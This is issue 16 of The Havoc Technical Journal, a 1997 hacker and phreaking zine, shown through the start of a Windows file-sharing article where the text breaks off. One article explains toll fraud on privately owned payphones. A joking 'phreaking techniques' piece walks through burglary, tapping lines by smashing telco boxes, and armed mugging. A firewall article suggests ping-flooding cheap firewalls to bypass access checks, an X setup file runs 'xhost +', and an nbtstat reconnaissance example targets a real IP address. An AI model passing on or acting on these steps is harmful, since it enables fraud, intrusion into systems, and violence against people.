Copy Link
Add to Bookmark
Report
The Havoc Technical Journal 16
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The Havoc Technical Journal - http://www.thtj.com - ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
vol.2 no.4 issue 16 ³ November 1st, 1997 ³ A thtj communications Publication
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
-³ the havoc technical journal issue 16 ³-
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Departments - total: 5k
5k Editorial..............................Scud-O 01
Phreaking - total: 16k
3k COCOTS.................................shamr0ck 02
7k Phreaking Techniques...................KungFuFox 03
6k Basics of Telephony....................AlienPhreak 04
Hacking - total: 51k
6k Basic Firewalls........................Onyx 05
6k X?.....................................³ntertia 06
3k Windows File Sharing Basics............Chameleon 07
31k PAM - Pluggable Authenication Modules..Scud-O 08
1k VPN's Demystified......................Meikon 09
4k LiteSpan 2000..........................XiLiCoN 10
Code - total: 11k
3k genericrack2.pas.......................The Messiah 11
2k genericrack2.c.........................Shok 12
2k word.c.................................memor 13
4k rm.c trojan Fix........................Shok 14
More Departments - total: 56k
18k Oddville, THTJ.........................Scud-O 15
38k The News...............................KungFuFox 16
ÄÄÄ
Total: 145k
Temporary site until thtj.com moves its nameservers
-------> http://www.antionline.com/thtj/ <------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ The THTJ Distribution Mailing List ³
³ NOW UP! ÄÄÄÄÄÄÄÄ !PU WON ³
³ majordomo@terminus.orc.ca ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
'subscribe thtj'
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³the havoc technical journal - contacts³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
- Editor in Chief: Scud-O, scud@thtj.com
- Executive Editor: KungFuFox, kungfufox@thtj.com
- Submissions Editor: Keystroke, submissions@thtj.com
- thtj email address: thtj@thtj.com
- thtj website: http://www.thtj.com/
- thtj mailing address: PO BOX 448 Sykesville, MD 21784
Send All Articles to : submissions@thtj.com
Submissions Info & Policy: http://www.thtj.com/submissions.html
Distribution Info: http://www.thtj.com/distro.html
To subscribe to The HAVOC Technical Journal, send mail to:
majordomo@terminus.orc.ca, with no subject, and the body reading 'subscribe
thtj' with out the quotes. Note that this majordomo is only for thtj distro.
The open mailing list is coming soon.
Subscribe to thtj online: http://www.thtj.com/subscribe.html
The Havoc Technical Journal Vol. 2, No.4, November 1, 1997.
A Havoc Bell Systems Publication. Contents Copyright (©)
1997 Havoc Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of The Editor
in Chief for The Havoc Technical Journal.
The Havoc Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
The articles provided in this magazine are without any expressed or
implied warranties. While every effort has been taken to ensure the
accuracy of the information contained in this article, the authors,
editors, and contributors of this zine assume no responsibility for
errors, omissions, or for damages resulting from the use of the
information contained herein.
For infomation about using articles published in THTJ, send mail to:
e-mail: thtj@thtj.com ³ mail: THTJ PO Box 448 Sykesville, MD 21784
NOTICE: if you are a government offical or employee reading this file, you
MUST register with thtj. A registration permit will be mailed to you free
of charge by using either of the mail addresses above. A Registration fee
of $50 is required upon submission of the permit. This will entitle you to
recieve thtj via a private mailing list, or via snail mail on a 3.5 floppy
disk.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 01 of 16
Editorial: THTJ Needs You / Microsoft is Scared.
By Scud-O, Editor in Chief
scud@thtj.com
THTJ Needs You!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Recently some of you out there have been saying what thtj needs to add
to its format. You say, but you do not act. THTJ is not just made by the thtj
staff, it is a zine made by the people, for the people. If you want to see
something added to thtj, then work with us on it. Do it. THTJ currently has
alot of matterial in it, but we have a serious shortage of phreaking articles
that are submitted to us. While hacking is more popular than even, and hacking
material is easy to come by, phreaking material is not. THTJ is working to
become a medium for phreaking information, but we can not do it with out you.
We urge you to help thtj and the underworld with phreaking materials.
THTJ also has a seriuos shortage of the following type of articles:
o NT Articles
o Phreaking
o UNIX Code
o Crypto
o VAX/Other OSes
The thtj staff is currently working to get articles on these subjects, but
we can not do it alone. Your submissions are critical. Your submissions are
*very* important to us. You help make this zine run.
Why write for thtj? Simple, thtj is one of the largest zines out there
covering hacking, phreaking, coding, crypto, etc. THTJ has recieved worldwide
coverage, and everyday thtj is reaching more people. Your name will be on
peoples minds after thtj has included one of your articles. After 2 or more
articles, you are eligable to be included on the thtj staff and receive some
goodies from thtj.com, information before anyone else has it, meet the
contacts and friends out there, and receive copies of thtj issues before
anyone else does.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Microsoft is Scared
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This month sees the release of Internet Explorer 4.0, and about a
million lawsuits that followed it. The Justice Department is cracking down
on Microsoft again, and Sun Microsystems is suing Microsoft for its use of
Java. However, all this should not be a surprize to anyone. Microsoft has
always practiced aggressive and unethical trade practices. And they did all
this for good reason with IE4. Microsoft is scared.
Why is the world's biggest company scared? They see the end of
Microsoft, if they do not act right now. The WWW and the internet explosion
took Microsoft by surprize. Look back 2 years ago, to the release of win95.
The Microsoft Network was the big thing when win95 first hit the streets.
MSN was very similar to AOL, everything was a new interface. Well, MS
dismissed the WWW as a temporary fad. Well, this blew up in MS's face. They
quickly released Internet Explorer 1.0 and 2.0, which were pathetic, when
compared to Netscape. Even in verison 2.0 however, MS was making MS only html
tags, and trying to get control of the HTML standard. With the new IE 4.0,
MS is only expanging this control. MS is trying to take over the internet's
most popular tool, the www. MS is also modding Java for obivous reasons. Java
is a *huge* threat to MS. Java means that programs are not only platform
independent, they are *OS* independent. MS has the control of the OS market,
and they do not want to lose this. They bought out Web TV for the same reason.
Web TV & Java == No need for a computer == No need for Microsoft. However, if
Microsoft gains control of Java and Web TV, they can make these work for them,
and they can gain even more of the population.
Microsoft will tell you that they are the innocent big boy that
everyone picks on, but this is pure bullshit. MS has always, and will always
practice 'aggressive marketing methods'. Example: making IE be included with
Win95 or, computer companies do not get Win95 for their machines. Example:
MSN is on the desktop in Win95, Standard. The list goes on. MS is nowhere near
innocent, they are guilty as sin. Do not feel sorry for them. Hell, do not
feel sorry for any multi-billion dollar company.
How can we stop MS from taking over the world? By mailing the
President. The Vice-President. Your Congressperson. Your Senator. The Press.
Anyone! This terror *must* stop, other wise we will not have a choice on
'Where we want to go today'
Scud-O , Founder, and Editor in Chief of THTJ
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Scud-O and HBS would like to hear your views on this issue.
Please feel free to e-mail us at: scud@thtj.com
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-
scud@thtj.com ³ http://www.thtj.com
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 02 of 16
COCOTS
By shamr0ck, Special to thtj
shamr0ck@juno.com
Introduction..
Today I'm going to show you some fun stuff you can do with COCOTs.
(Customer-Owned Coin-Operated Telephones). COCOTs are payphones owned by
individuals and private companies. COCOT payphones have been around for many
years. The reason COCOTs are really hitting the market is because of the
money. COCOT owners get to keep about 85% of the profits, the rest goes for
taxes, and trust me thats A LOT. By 1991, there were more than 30,000 COCOTs
in the New York State alone. Just think of how many are in the rest of the
country. Yes, it's a very big industry. Some COCOTs out there are served by
AOS (Alternate Operator Service) companies, such as US Sprint, AT&T and MCI,
but they only serve them. Most COCOTs don't have their logo on them, although
I have seen them on some. ALL COCOTs are required to provide a caller with
access to the local exchange telephone company offering service within the
area in which the call originates. Callers should be able to reach the long
distance company of their choice by dialing 10xxx for AT&t, MCI, etc.
Things to do with a COCOT
You have to know what your looking for. COCOT payphones do not have any big
name phone company logos on them. You can usually find them in big hotels,
inside and outside of restaurants, and a bunch of other places. So you have
found a COCOT. "Now what the fuck do I do with it?" You get on the phone
and dial an 800 number and you tell them to fuck off. Then they hang up on
you (don't call a telco 800 number or some fed office, dumbass). For about
five secs you will hear a modem type sound. Yeah, thats the 1200bps modem
inside the COCOT. After you hear that you should hear a dial tone. Now you
can dial out with out paying a cent. On some COCOTs you have to dial using a
radio shack tone dialer ($25) because they disable the keypad when there's
no money in the coffer. "So I did that but it still doesn't want to work.
What do I do now?" Well if you tryed dialing out using both the keypad and
the tone dialer you are out of luck. I have seen the new COCOTs around, and
they really suck. You can't dial out because they deaden the handset. Never
give up though, there are still a lot of old COCOTs around.
"Ok, I made a lot of calls using a COCOT. Who pays for it?"
The owner of the pay phone does..if you really like that COCOT you shouldn't
think you are 0-day (do not abuse the fraking cocot). If you abuse it you
will:
1. Get cought.. they do get a phone bill and they do get the numbers you
called on the bill..they are on the ESS.
2. The payphone will get taken away (make calls to france from N.Y. and talk
for 10 hours a day; I think you know what I'm getting at)
3. Your mom will catch you and slap you around a bit with a large trout..
Good luck.
-shamr0ck shamr0ck@juno.com
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Subscribe to The HAVOC Technical Journal
Subscribe today and get the special rate of FREE!
It's like getting 12 issues a year for free!
ÄÄ
send mail to: majordomo@terminus.orc.ca, with no
subject and the body of the message reading 'subscribe
thtj' with out the quotes.
ÄÄ
or sign up online:
http://www.thtj.com/subscribe.html
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 03 of 16
Phreaking Techniques
By KungFuFox, Executive Editor
kungfufox@thtj.com
Welcome to the wonderful world of phones! Do you wanna make phonecalls for
free?! Do you wanna have lotsa fun at the expense of somebody else?! Do you
wanna have a beigebox or a redbox, but don't even know what they are?! Read
on k-rad kiddies!
Lets start off with some basics, the kinda info you need to become a real
phreak like the big boys! You gotta learn how to get free phonecalls! Lets
start off with a pretty simple way, with a beigebox! I know you don't know
what that is, it doesn't matter, I'll tell you how it works!
Basically you get a phone, and you plug it into somebody else's house instead
of yours! Don't have a phone? No problem! My poor man's beigebox works just
as well, and all you need to use it is a rock! Either one from your home or
from the location of your victim is fine. Get to the victim's place,
preferrably at night, and find a window to a room you think has a good chance
of having a phone in it, and chuck the rock at the window. Make sure you're
not standing right next to the window when you do this, because it's liable
to break, granted you don't have two broken arms to throw rocks with. If you
can find a neighborhood filled with deaf people, or a slum where people hear
windows breaking regularly, this phreaking technique is much more likely to
work.
Ok, now that the window is sufficiently removed, you need to get in there.
Hopefully you picked a window that wasn't 10 feet off the ground. Climb on in
there, making sure you don't peel the skin off your body, and look for a
phone. Though you may be tempted, it isn't a good idea to turn on the lights
when you start looking for that phone, obviously because turning on the
lights is a lot more suspicious than breaking a window. Now for the
complicated part.
Once you've located the phone, you have to use a special technique to use it,
because ma bell designed phones so you can't beige box with them at normal
phone jacks. Rip the phone out of the wall, so that the plug on the end of
the wire becomes separated from the wire. Bite off the plastic cover on the
wire, and you'll see 2 or 4 wires inside it. You'll be dealing with the red
and green wires. Strip away a couple inches of that colored insulation from
those two wires. Now your beigehox is prepared for use. The only thing left
to do is find a place to beige from.
If this building you used your geolocial key to get into has a basement,
you'll probably wanna go down there and look around for a plastic box mounted
on a wall. It'll probably have a phone company insignia on it, most likely a
generic bell shaped symbol, and a name with the word "bell" in it. Other
possible names are "uswest", "ameritech", and "nynex". If this plastic box
thing isn't in the basement, look around outside for it. It'll be on an
outside wall somewhere around building.
Once you find it, bash it good with your beigebox until it breaks open. You
can use your feet and hands if you like. You could even use the rock you
removed that window with if you can find it. Just make sure you bash the
cover off that plastic box. Hopefully after all this work you'll be greeted
with some screws in some strange geometric pattern. Hold the beigebox's
handset up to your ear so you can hear it if it gets a dailtone, and start
touching the red and green beigebox wires to different screws. After a few
minutes if you don't have a dialtone, you're either retarded or the phoneline
is disconnected. In the latter case, you'll need to goto another building,
find another plastic box with a phone company insignia on it, and try the
same procedure there. If you're just retarded, bash yourself in the head with
the beigebox. It's probably angry at you anyway, for ripping it out of the
wall.
Another good way to make free phonecalls, and become an elite phreak, is to
redbox. Don't know what a redbox is either? No sweat! I'll tell you how to
get free calls just like a redbox does, but without the time consuming
construction!
First things first, you need to find a payphone. Any payphone will do, so
long as it works. Don't believe any of the undercover telco people on irc
that may tell you redboxes don't work. They do! Once you've found yourself a
payphone, you need to get to get money to use it. Ha! I didn't mean your own
money! That wouldn't be free! My first technique is something I'll call
begging.
To beg successfully, you'll need to look shabby. Don't shave if you're old
enough that shaving matters, and don't comb your hair or whatever it is you
normally do to it. Also, your worst clothes, slept in the night before your
first redboxing day, is a good idea. Bring along a disposable cup, you can
find one on the way if you need to, and go to that payphone. Now, when people
walk by it, or walk up to use it, they're probably gonna have some change.
Just sit there looking real pathetic and people are bound to start dropping
as few coins as they can into your cup. Don't worry, even though they're
cheapasses, eventually those small donations to your personal charity will
add up. Once you've got like five bucks, you can start making calls, and they
won't have cost you any money at all!
My second technique, which is a much more effective method of obtaining
funds, is something I like to call mugging. This will take some patience
though, for you need to find the weakest person possible before attacking.
Preferrably you should find somebody who wieghs a lot less than you do. Once
you've found your anonymous donor, you may either knock them down, or simply
grab them. Weapons such as guns and knives are excellent when implimented
properly, to terrify your victim into submitting to your demands for money.
Once you've acquired the funds that you feel are necessary to support your
need to make free phonecalls, and become a better phreak, you may let them
go, and get yourself to a phone, to start using that money.
Ok now that you've acquired a couple tricks of the trade, get your lazy ass
out there and phreak!
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 04 of 16
Basics of Telephony
By AlienPhreak
Surprisingly enough most phreakers don't even know the real basics of the
telephone system. This article will outline the following features:
POTS
Trunks
The Switching System
PBXs (PABXs)
The Plain Old Telephone System (POTS):
The main part of the POTS is the actual telephone. The telephone requests
network access by using a signalling method called loop start. When the
telephone starts its session it's called "off hook" voltage, indicating the
voltage being sent from the switch or CO through the 2-wire connection
(red and green wires). Of course when you don't pick up the receiver the
phone is on hook.
When the telephone receives a call the network (switch) gives ring voltage
out to the telephone (90 VAC over the DC voltage). Then you get those happy
rings and you pick up the phone. For the phone to dial out you need a type of
signaling. Before Dual Tone Multi-Frequency (DTMF), there was good ol' rotary
or pulse dialing. DTMF is pretty much the standard these days on most
switching systems. Pulse Dialing is still used in some areas.
Another Signaling method is MF or Multi-Frequency. Like DTMF, MF is used on a
few types of trunks and CCITT signaling. If you know anything about the old
Blue Boxes, they used the KP, ST, R1-R2 signals, et cetera, which are
actually MF signaling.
Now the tricky part is converting speech into electrical signals. For the
switching system to change your voice into signals, it uses Transmit Loudness
Objective Rating (TLOR). For you to receive the signals the switch then sends
out Receive Loudness Objective Rating (RLOR).
Central Office (CO):
In many phreaking articles you will see the acronym CO, which of course
stands for Central Office. The CO is pretty much the center of all the local
phone networks. It connects you to the rest of the world and all the other
switches. The CO is a physical facility where all of the networking and
routing switches are physically held. The trunks are what call the other
trunks within other COs (where the trunk directs or "routes" your call
depends on where you are calling to). There is no main purpose of the CO
besides housing all of the computers, trunks, and line-cards associated with
the local network.
The Switching System:
The first major independent switching system was Step-by-Step (SxS)
switching. SxS was run by electro-mechanical switches. It is now a rather
archaic system but is still used in some places. Dial pulses would be used to
cause the switches to select switch groups until the full number was dialed.
Crossbar Switching (XB) was the next electro-mechanical switching system to
come into play. The XB system was set up much differently than SxS. It used a
matrix of connectors arranged in a grid to form its connection scheme.
ESS was the first non-mechanical switching system. It provided many more
features than the basic calling system of SxS. ESS could handle both pulse
dialing and DTMF signaling. The main ESS, which used the 1A processor, was
easily upgradable to 1ESS. The processor also controlled 4ESS, allowed it to
be easily upgraded, and ran in real time. 5ESS is almost the "industry
standard switch" of today, and is far superior to Nortel's DMS switches. The
5ESS is manufactured by AT&T and is used by almost every RBOC (Regional Bell
Operating Company). The 5ESS's are almost entirely unix based, though it is
very different from the unix systems you or I run. It has many more features
and is set up by AT&T for their routing and channeling.
Private Branch Exchanges (PBXs):
The PBX is almost like a miniature switch. It controls a small area like a
business or a school phone system. The point of a PBX system is for companies
to use as few telephone lines as necessary to get the most out of their
telecommunications budgets. If you have 100 people and 100 phones, the fact
is not all 100 people are going to be using the fones at the same exact time.
PBX systems provide switching of in-house calls, and "pool" the outside
lines.
There are many functionalities of the PBX, such as paging systems and voice
mail boxes (VMBs). There are many neat things a phreaker can do to with a
PBX. Some PBXs are set up so that someone can call in and they will get an
automatic dial tone. After that they enter a code and the user is allowed to
dial out, with the call being billed to the company that owns the PBX. Of
course this can be abused, along with the VMB.
PBX networking can be very complex. I will only cover one type of Switched
Services Network (SSN). An Electronic Tandem Network happens to be what my
private school phone system uses. It's set up in the manner that all lines
(extensions) have a three digit address. Automatic routing can take place
within the private network. This SSN is setup on a privatly owned trunk so
that the company or school can set it up however they would like.
Trunk Signaling:
Due to time constraints I can only talk about one type of trunk signaling,
the Single Frequency (SF). SF signaling is used on all 4 wire analog systems.
SF is a type of 'inband' signaling scheme where all information is
transmitted in the voice band. SF uses 2600hz and 2280hz signals to transmit
data. When the trunk is in an on-hook state the 2600hz or 2280hz tone is used
to connect to the remote site. When the trunk is in an off-hook state the
2600hz or 2280hz tone is dropped. SF units can pass dial pulse address
signaling at speeds from 8 to 12 (pulses per second) PPS with 56 to 69
percent break.
*2280hz is only used in British Telecom's trunks.
This concludes my article on the basics of the telefone system. If you see
anything wrong with this article or just want to comment on it please email
me at alienphreak@linenoise.org.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 05 of 16
Basic Firewalls
by Onyx
Part1
I am writing this article to basically confirm and dispell ideas
about firewalls. The first section is for people who just want the
jist of what a firewall is the second section is more technical Most
people ,espescially hackers, consider firewalls a very big threat and
make them to be something they are not. First lets define one in the
simplest terms. A firewall is a computer sitting between your network
and the Internet that runs special software to keep people out. That's
it in the simplest terms. Firewalls can be configured in several ways
and doesn't have to be on a seperate computer that only runs the
firewalls software. Lot's of times a so called "poor man's firewall"
can be configured by using a computer that is also used for other
applications. Most of the time a firewall setup looks something like
this (forgive the crude drawing)
>
Network-------Web Server----Firewall>----Internet or
>
>
Network-------Firewall>-----Webserver----Internet
>
In the first example everything is behind the firewall, thus
theoretically your network and web server are behind the firewall. In
the second example your web server is vulnerable to attack, but even
if you manage to breach the web server's security to get to the
Network you still need to get past the firewall. The second
configuration I consider more safe although others will argue
differently (it is sometimes referred to as the "sacrificial lamb"
configuration because you are "sacrificing" your web server).
Getting back to what a firewall does. A firewall is designed to block
access to certain things. Most of the time this is based on domain,
which leads to one insecurity which I will get to later. As an example
lets use the site, secure.com. Say secure.com decides to setup a
firewall that denies access to port 23 (telnet) to everyone except to
those who are apart of a certain domain. Now most of the time
companys are too cheap and don't want to pay for expensive firewall's.
So to get access the easiest way is to ping the firewall so it gets
too lagged to check who you are and just drops to the desired service.
This ONLY works for cheap firewalls. Some sites who know nothing of
computer security and assume someone trying to break into their site
know virtually nothing also (idiots) have tried to setup stupid "fake"
firewalls. I ran into a site which will remain anonymous that to ,
deter hacking attempts, said on the login screen that this was
something something firewall blah blah blah. Well anyway it wasn't a firewall and they were just trying to scare people into
thinking it was so hackers would leave their site alone...didn't work
for me =) So trying not to get to technical here, a firewall that
checks access to a service through domains can be spoofed. If you
would like to know about spoofing their are plenty of articles out
there for you to read.
Section 2
People who are interested in more technical details read on:
This will be a more in-depth description of a firewall. People throw
the word firewall around a lot and don't know exactly what constitutes
one and what kinds their are. Most firewalls are screening routers.
They provide packet filtering and work with the lower level of the
network protocol stack. Another type is known as a proxy server
gateway (I know it sounds imposing). They preform basic proxy
services for external networks for internal users. These actually
look at the data INSIDE packets. And finally the third type uses what
is known as a stateful inspection technique. Firewalls are most often
built ontop of routers and routers intern are used with gateways
offering high-end protection. Here is another crappy diagram which
depicts a screening router NOT a proxy server!
|
Internet----------->|---------- |
<------------|----------User |=Screening Router
|
A proxy server looks SIMILAR, but not EXACTLY the same. Instead of
just some simple uncomplicated software proxy servers are actual
computer(s) that run ONLY special proxy software.
Another thing I would like to point out about firewalls are that they
are basically a newly *implemented* technology. The technology ,
however, has been around for a while. Since the implimentation of the
TCP/IP protocol. All that was required to develop them was some smart
thinking. One of the recent developments was allowing video and audio
conferences through firewalls. Before to allow this people had to
setup the firewall so that it didn't utilize it's full potential for
protection. When a person decides that they want a firewall they have
to decide what services they want to offer. I know this will sound
stupid, but u CAN setup finger to work through a firewall. Now I
don't know exactly why you would want this except if you wanted your
users and every other person on the net to know who is currently
logged onto your network. Some of the services you can use through a
firewall are:
Telnet
FTP
HTTP
Finger (sigh)
Gopher-Archie
Their is one more. X. Now I know those of you who are familiar with X
security will be plotting in your evil little minds now (hehehe). Well anyway
if you aren't familiar with X what you should at the very least know is that
it is very insecure. One of the major problems with it is that users can
monitor your keystrokes. In some instances you can ,over a telnet proxy,
start a virutal x server.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 06 of 16
X?
By ³ntertia, Special to thtj
inertia@webzone.net
In general, when one thinks of an operating system that has a
graphical user interface, one thinks Microsoft Windows, not the X Windows
System. This person is missing out. Here, I will attempt to explain X
and it's counterparts, such as the XFree86 Project... along with with many
examples of why X is better than everything else. My technical experience
is limited to Linux, so XFree86 and how to successfully implement it on
your OS will be the bulk of this article.
So what exactly is "XFree86?" XFree86 is the focus of the XFree86
project, developed to provide a GUI for Linux, OpenBSD, and OS2, among
many others. X along with a good window manager (a window manager
provides the GUI and sets the level of configuration for your
environment, along with providing you a means of control) makes Windows 95
look like total crap. X has yet to reach the level of user-friendliness
that Windows has, but hell, we're talking about Linux here, not DOS. When
you get familiar with X then that Win95 partition is outta here. ;]
Enough background and opinions, let's take it to another level, shall we?
So now that you know about X... it's time to pay attention to where it
lies in your HDD. (From now on we're talkin Linux only, X11R6, the current
version) X is drawn from /usr/X11R6 to make it simple, this is where X and
all of it's accessories, games, etc. are located. This makes X easily
accessible, since it's not thrown into other directories, e.g.
/usr/X11R6/bin instead of /bin. Now that the general location has been
determined, you might wonder which files are important or which files do
what on your system. Keep reading.
X, like anything else, has proprietary commands, that cannot be
successfully executed without an X display open. If you are new to
linux, at the shell prompt type startx to begin an X session, or if you
prefer an X login prompt to skip over multiuser mode completely then
edit the initial runlevel to 5 in /etc/inittab. To change video card
settings etc, run the command Xconfigurator in a shell or in X itself.
Sorry if the instructions are vague but the intention of this is not to
show you how to run X, but to explain in an understandable manner the
unique attributes and advantages of the system and provide general
information on how to
better understand how it works. You cannot, of course, open Netscape while
inside a shell... you can inside of an Xterm in X (an Xterm is simply a
shell emulator that is run through X) but otherwise it is impossible.
Naturally, these proprietary commands are all GUI programs, but many are
very powerful. Now is the time that I could go into the people who say
they hate Windows because it's the cool thing to say, haha, but I at least
have valid reasons for picking X over Windows any day. Don't be stupid and
think that just because you are provided a GUI, the program is weak,
because, well, you would be wrong. For example, there is an XFree86 driven
kernel hacker, Xconfig. If you run X, next time you recompile your kernel
type make xconfig instead of make config. The organization of the XFree86
system and it's identifying commands have been mentioned, now we will look
at how it comes together.
Upon startup, the .xinitrc file is read. Here is my .xinitrc:
#!/bin/sh
# Turbo Linux XINITRC by Scott Stone (sstone@turbolinux.com)
userresources=$HOME/.Xresources
usermodmap=$HOME/.Xmodmap
sysresources=/usr/X11R6/lib/X11/xinit/.Xresources
sysmodmap=/usr/X11R6/lib/X11/xinit/.Xmodmap
# merge in defaults and keymaps
if [ -f $sysresources ]; then
xrdb -merge $sysresources
fi
if [ -f $sysmodmap ]; then
xmodmap $sysmodmap
fi
if [ -f $userresources ]; then
xrdb -merge $userresources
fi
if [ -f $usermodmap ]; then
xmodmap $usermodmap
fi
#
# Programs & Window Managers
#
#xsetroot -solid gray7 &
#xterm -T 'Login Shell' -ls &
#xbiff -update 5 -geometry +5-5 &
# Uncomment this line if you want other machines to be able
# to open windows on your machine (by default):
xhost +
# Start up a window manager - only one of these lines should be
# un-commented.
afterstep
#fvwm
#fvwm95-2
EOF
The file in itself keeps things nice and simple... as you can see, it sets
the paths to a couple of other initialization files, reads them (.Xmodmap
and .Xresources), provides you with an option to let others access X on
your computer, and then looks for a window manager to start up with. Along
with these initial functions, the window managers have their own
initialization files to be read. To go into that would be overkill at this
point. The system has been configured and all ready to start up... but
what happens when it is not successfully run? Next we will go into common,
even frequent, errors that you will most likely face at some point in time.
One of the simplest problems to overcome is an improper video card or
color/resolution specification. This can be fixed by running Xconfigurator
or simply passing arguments to the command line, such as startx -- -bpp 24,
which will start X in 24 bit color mode, replace 24 with 8, 16, etc. to
meet your own needs. Invalid settings have, personally, caused 90% of the
problems that I have with X. A common error message for this is "server
is already running, blah blah blah." Another error is "unable to access
security policy etc." That, I have heard, is a bogus message in some
versions of X11R6, and can be fixed most easily through re-installation, if
you can call that easy maintenance.
In conclusion, X is a durable, and surprisingly enough, easy to use
system. The level of control you have over is amazing to the typical
Windows user, and is well worth the time to check out. I would like to go
into higher detail, but I don't really have the time to write such a large
document at once that would include color tables, a little source, and VERY
cool feature, hosting X applications to a remote user. If you have any
suggestions to a good continuation to this article feel free to email me.
Peace...
inertia@webzone.net
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 07 of 16
Windows File Sharing Basics
By Chameleon, Special to thtj
Chameleon@intercore.com.ar
Now to you nt gurus this is all very basic but since most of you are unix
hackers you probably dont know shit about windows. It is a must to start
learning windows now. NT is getting big. More and more each day people are
starting to use it. Yes I agree I hate NT and love a good ol unix box but we
must keep up with technology. NT is widely used even by places like the
Pentagon. (*caugh*it was easy to hack*caught*) Ok class lets start...
Say you have an IP address that you want to try and get access to you would
do this
Example for IP address: 194.8.235.73
Note: Use IP addresses because the name address sometimes wont work and the
IP will so use IP addresses.
Drop to dos:
c:\windows> nbtstat -A 194.8.235.73
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MAILGATE <00> UNIQUE Registered
MAILGATE <03> UNIQUE Registered
MAILGATE <1F> UNIQUE Registered
MAILGATE <20> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MIRAGE <00> GROUP Registered
MIRAGE <1D> UNIQUE Registered
MIRAGE <1E> GROUP Registered
MAC Address = 00-00-00-00-00-00
----------------------------------------------------------------------------
